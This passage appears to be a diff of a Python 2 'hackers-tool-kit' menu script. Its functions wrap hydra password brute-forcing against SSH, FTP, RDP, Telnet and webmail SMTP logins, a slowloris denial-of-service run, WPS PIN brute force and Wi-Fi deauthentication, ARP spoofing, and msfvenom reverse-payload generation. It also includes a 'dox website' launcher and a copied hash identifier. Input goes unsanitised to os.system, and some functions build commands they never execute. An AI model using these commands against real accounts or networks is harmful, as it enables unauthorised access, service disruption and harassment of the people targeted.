-e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -#-------------------# -#HYDRA AUTOMATED END# - - -#WORDLIST MAKER START# -#--------------------# -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -#------------------# -#WORDLIST MAKER END# - - -#LIST FILES START# -#----------------# -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" -#--------------# -#LIST FILES END# - - -#MONITOR MODE OFF START# -#----------------------# -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -#--------------------# -#MONITOR MODE OFF END# - - -#TURN ON VPN START# -#-----------------# -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -#---------------# -#TURN ON VPN END# - - -#TURN OFF VPN START# -#------------------# -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -#----------------# -#TURN OFF VPN END# - - -#SLOW LORIS DOS START# -#--------------------# -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') - os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) - os.system('echo "run\n" >> slowl.rc') - os.system('msfconsole -r slowl.rc') - os.system('rm -rf slowl.rc') -#------------------# -#SLOW LORIS DOS END# - - -#OPEN DOX WEBSITE START# -#----------------------# -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -#--------------------# -#OPEN DOX WEBSITE END# - - -#SCAN SPECIFIC NET START# -#-----------------------# -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -#---------------------# -#SCAN SPECIFIC NET END# - - -#DEFAULT WIFI PIN START# -#----------------------# -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -#--------------------# -#DEFAULT WIFI PIN END# - - -#WIFI PIN BRUTEFORCE START# -#-------------------------# -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -#-----------------------# -#WIFI PIN BRUTEFORCE END# - - -#DEAUTH ATTACK START# -#-------------------# -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -#-----------------# -#DEAUTH ATTACK END# - - -#MAC CHANGER START# -#-----------------# -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-----------------# -#MAC CHANGER START# - - -#MAC CHANGER OFF START# -#---------------------# -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -#-------------------# -#MAC CHANGER OFF END# - - -#ARP SPOOF START# -#---------------# -def arpspoof(): - print "\033[93mif using multiple targets heres an example: 134.143.1.3, 134.143.1.6\033[0m\n" - h = raw_input("Targets: ") - os.system('echo "net.sniff on\n" >> arp.cap') - os.system('echo "set arp.spoof.targets {0}\n" >> arp.cap'.format(h)) - os.system('echo "arp.spoof on\n" >> arp.cap') - print '\n\033[93mto stop type "exit"\033[0m' - os.system("sleep 2") - os.system("bettercap -no-history -caplet arp.cap") - os.system("rm arp.cap") -#-------------# -#ARP SPOOF END# - - -#SSL SCAN START# -#--------------# -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -#------------# -#SSL SCAN END# - - -#MAKE A PAYLOAD START# -#--------------------# -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -#------------------# -#MAKE A PAYLOAD END# - - -#WORDLIST MAKER START# -#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - 